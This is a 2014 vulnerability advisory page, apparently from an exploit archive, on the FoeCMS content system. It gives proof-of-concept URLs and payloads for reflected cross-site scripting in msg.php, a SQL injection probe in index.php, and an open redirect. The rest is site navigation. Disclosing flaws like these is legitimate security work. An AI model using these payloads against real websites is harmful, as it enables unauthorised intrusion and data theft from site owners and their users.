FoeCMS XSS / SQL Injection / Open Redirect

FoeCMS XSS / SQL Injection / Open Redirect: Posted Jul 4, 2014; Authored by Govind Singh; FoeCMS suffers from cross site scripting, open redirect, and remote SQL injection vulnerabilities.; tags | exploit, remote, vulnerability, xss, sql injection; SHA-256 | 373b14a802742c8d613fb2743e64b61f0bfc3763a5b30acc73bc0bf3f7a060b5; Download | Favorite | View

FoeCMS XSS / SQL Injection / Open Redirect

##################################################################################################
#
#Exploit Title : FoeCMS multiple vulnerability 
#Author        : Govind Singh aka NullPort
#Vendor        : http://foecms.com/
#Download Link : https://github.com/themarioga/FoeCMS/archive/master.zip
#Date          : 05/07/2014
#Discovered at : IHT Lab ( 1ND14N H4X0R5 T34M )
#Love to       : Manish Tanwar, DeadMan India, Hardeep Singh, Amit Kumar Achina , Jitender Dangi
#Greez to      : All IHT Members 
##################################################################################################

Reflected Cross-Site Scripting ::
---------------------------
Reflected Cross-Site Scripting effecting "msg.php" with variables "e" & "r"
PoC : 1 with variable "e"

http://localhost/FoeCMS/msg.php?e=[XSS]

http://localhost/FoeCMS/msg.php?e=%3Cscript%3Ealert%28%27hello%27%29;%3C/script%3Ecms_delinstall&r=index.php&nr=1

payload : <script>alert('hello');</script>

PoC : 2 with variable "r"
http://localhost/FoeCMS/msg.php?e=cms_delinstall&r=[XSS]

http://localhost/FoeCMS/msg.php?e=cms_delinstall&r=%27%22%3E%3Cscript%3Ealert%28%27hello%27%29;%3C/script%3E

payload : '"><script>alert('hello');</script>
----------------------------------------------------------------------------------------------------
Cookies Based Sql injection ::
-------------------------
http://localhost/FoeCMS/index.php?i=[Sqli]

PoC : 
http://localhost/FoeCMS/index.php?i=-1' order by 3--+
----------------------------------------------------------------------------------------------------
open Redirect ::
Open Redirect effecting "msg.php" with variable "r" when we set value of "r=https://scontent-a-ams.xx.fbcdn.net/hphotos-xaf1/t1.0-9/q71/s720x720/419153_136544006541776_1226726278_n.jpg" 
-------------------------
PoC : Open Redirect with variable "r"

http://localhost/FoeCMS/msg.php?e=cms_delinstall&r=[Redirect]

http://localhost/FoeCMS/msg.php?e=cms_delinstall&r=https://scontent-a-ams.xx.fbcdn.net/hphotos-xaf1/t1.0-9/q71/s720x720/419153_136544006541776_1226726278_n.jpg

Top Authors In Last 30 Days

Red Hat 226 files
Ubuntu 86 files
Gentoo 31 files
Debian 21 files
tmrswrr 10 files
Sina Kheirkhah 7 files
bRpsd 4 files
Rodolfo Tavares 4 files
nu11secur1ty 3 files
Google Security Research 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,078)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,374)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,287)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,660)
UNIX (9,426)
UnixWare (187)
Windows (6,666)
Other

FoeCMS XSS / SQL Injection / Open Redirect

FoeCMS XSS / SQL Injection / Open Redirect

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

FoeCMS XSS / SQL Injection / Open Redirect

Share This

FoeCMS XSS / SQL Injection / Open Redirect

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems